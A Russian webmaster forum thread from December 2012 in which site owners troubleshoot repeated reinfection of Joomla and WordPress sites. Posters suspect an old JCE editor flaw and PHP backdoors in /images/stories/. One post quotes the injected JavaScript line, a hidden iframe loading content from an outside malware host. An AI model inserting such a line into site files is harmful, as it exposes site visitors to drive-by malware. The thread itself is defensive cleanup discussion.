Проблемы с сайтом, внедрены вредоностные коды на сайте
Страницы: Пред. 1 2 3 4 5 След.
Проблемы с сайтом, внедрены вредоностные коды на сайте
я не знаю. удалить код можно, но он появляется опять.
подобные штуки у меня бывали, но сейчас слишком все необычно.

файлы записываются не по ftp, так как смена паролей не помогает, и в логах пусто.

возможно на сервер залит какой-то php-скрипт, который это делает. или уязвимость в джумле.
но тогда непонятно, почему восстановление сайтов из бэкапов помогает только на 10 минут.
Аналогичная проблема. Касперский ругается на все сайты. Другие антивирусы молчат. Заражены сайты с разными версиями joomla, а так же worppress. За день было замечено: Распространяется мгновенно. Через 1 час - 1,5 часа меняет ссылку в айфрейме. Все они располагаются на одном хостинге. Смена паролей от фтп не помогает. После полной заливки чистых сайтов через 10-15 минут все js файлы в конце кода снова заканчиваются строчками
Код
 ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;"
 src="dwdqodil.qhigh.com/b5e7875e8b414bb648b26.bav?11"></iframe>');
Поисковые системы пишут о вреде. Каспер не пускает на сайты.
На сервере isp manager.
www.h-online.com/open/news/item/Joomla-sites-misused-to-deploy-malware-1766841.html]Вот статья на похожую тему. Там во всем винят jce старых версий. Если у кого есть подскажите, может вместе начнем копать в этом направлении. У меня при заливке сайтов заново и обновлении/удалении jce происходит заражение. остается ток один вариант проверять каждый сайт на отдельном аккаунте. Но думаю это (около 40 сайтов) займет довольно огромное количество времени. Подскажите кто нибудь пожалуйста, что можно сделать. Спасибо заранее.
И у меня такая же проблема.
Простые HTML сайты не затронуты. Только сайты с БД заражены.
Мне кажется началось все это в промежуток между 19 и 21 декабря 2012 года. Раньше все было ОК.
Хостинг JustHost. Техподдержка  JustHost говорит: решение ищите сами, проблемы вирусов на плечах самих клиентов.
Какой у кого хостинг?
Что делать? smile:confused:
Цитата
Сергей Моисеев пишет:
И у меня такая же проблема.
Простые HTML сайты не затронуты. Только сайты с БД заражены.
Мне кажется началось все это в промежуток между 19 и 21 декабря 2012 года. Раньше все было ОК.
Хостинг JustHost. Техподдержка JustHost говорит: решение ищите сами, проблемы вирусов на плечах самих клиентов.
Какой у кого хостинг?
Что делать? smile:confused:
У меня рег.ру. Говорят тоже обновлять и исправлять. Вобщем пока не уверен, но что то вроде выделил. Отделил сайты на новой joomla и wordpress. Старые (1.5 joomla) перекидываю на другой аккаунт. Больше часа никаких зараженных скриптов. Теперь надо выделить из пяти старых виновника дырки. Думаю их по одному включать и наблюдать. Может быть это просто затишье перед бурей и я не прав. Может с утра опять все сайты подцепят. О результатах экспериментов со старыми версиями joomla отпишусь. Копайте в сторону jce. Где читал везде пишут на них.
Изменено: Владимир Сергеев - 22 Декабря 2012 04:07
Цитата
Сергей Моисеев пишет:
И у меня такая же проблема.
Простые HTML сайты не затронуты. Только сайты с БД заражены.
Мне кажется началось все это в промежуток между 19 и 21 декабря 2012 года. Раньше все было ОК.
Хостинг JustHost. Техподдержка JustHost говорит: решение ищите сами, проблемы вирусов на плечах самих клиентов.
Какой у кого хостинг?
Что делать? smile:confused:
Если быть точной 19 как раз только гости ушли и началось....
Перезаливка сайта регулярная смена паролей, попытки догнать его до 1.5.26 + усиление безопасности, но начинать с проверки своего компа у меня был бекдор
на двух сайтах с joomla 1.5, на которых был установлен jce, в папке /images/stories/ нашел подозрительные php скрипты.
удалил их, заражения прекратились.
Проблема обычно с jce. Судя по всему по Рунету продят сразу несколько разновидностей одного и того же виря.
Недавно описывал процедуру fstrange.ru/coder/about_all/joomla-poisk-virusov.html]лечения Джумлы у себя в уютном.
Обычно исполняемая часть прячется в папке /images и\или ее подпапках. Там php файл с шифрованным телом.  Смело можно удалять. С него заражаются js файлы.
Цитата
rt23 пишет:
на двух сайтах с joomla 1.5, на которых был установлен jce, в папке /images/stories/ нашел подозрительные php скрипты.
удалил их, заражения прекратились.
а как ты рнашел такой подозрительный скрипт скинь пример и в чем разница там..
Всем привет!
Сегодня столкнулся с такой  же проблемой. Все 10 сайтов на джумла заражены, на вордпрес еще не проверял, нашел вот такое /images/stories/.cache_izpx4z.php, но после ее удаления в течении 10 мин снова появляется...так что скорее всего еще где-то есть источник...продолжаю поиск.
Вроде решил проблему. Действительно в одном из сайтов в папке images/stories были php скрипты
cache_9gcgrw.php
koabook.php
seoTySP.php
story.php

joomla 1.5.26
Вроде дырка в jce старой версии за 2009 год (версия 1.5)
Изменено: Владимир Сергеев - 22 Декабря 2012 19:23
Цитата
Владимир Сергеев пишет:
Вроде решил проблему. Действительно в одном из сайтов в папке images/stories были php скрипты
cache_9gcgrw.php
koabook.php
seoTySP.php
story.php

joomla 1.5.26
Вроде дырка в jce старой версии за 2009 год (версия 1.5
объясни поэтапно как искал, лечил...может, что похожее есть, в каких файлах...папках ?story.php тоже есть
что за дырка в jce ?
Изменено: detalux - 22 Декабря 2012 20:51
в папке у меня /images/stories/   там ничего нету такого везде посмотрела.... где еще можно там посмотреть поискать?... 

вчера я на главной странице своего сайта увидела что там в сумом верхнем углу полосочка маленкая незаметная там я сделала код элемента этого и что нашла там был червь сделала два скрина... потом я написала хостерам об этом и скинула эти два скрина... и не знаю они убрали его или он убежал кудато ... что думаете?

у вас на моем сайте при входе посомтрите пожалуйста есть ли предупреждение? www.zapichi-recept.ru
Каспер 2013 молчит, судя по всему все ок у вас, мож уполз
в админ панеле сайта я хотела в настройки коментариев войти и смотрю мне пишет предупреждение прикиньте.... сейчас скрин покажу... что делать?
а касперский 2013 прямо сайт может проверять? а как себе такой поставить?
3333.jpg (210.61 КБ) [ Скачать ]
Страницы: Пред. 1 2 3 4 5 След.
Похожие темы:
Читают тему (гостей: 2, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
10:03 Как продвигать сайт с неуникальным контентом 
08:58 Стоит ли добавлять сайт в Rambler топ 100? 
08:57 Absence в Армении 
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
12:01 PonyBit.ru - обменный пункт PonyBit.ru (Понибит.ру) 
05:17 Продам копию сайта. 
04:11 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
01:31 Скрипт обменника валют 
21:44 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
17:24 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
14:01 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
11:07 Ну что, кто куда деваете свои сайты? 
22:09 Добро пожаловать в цифровой мир... 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди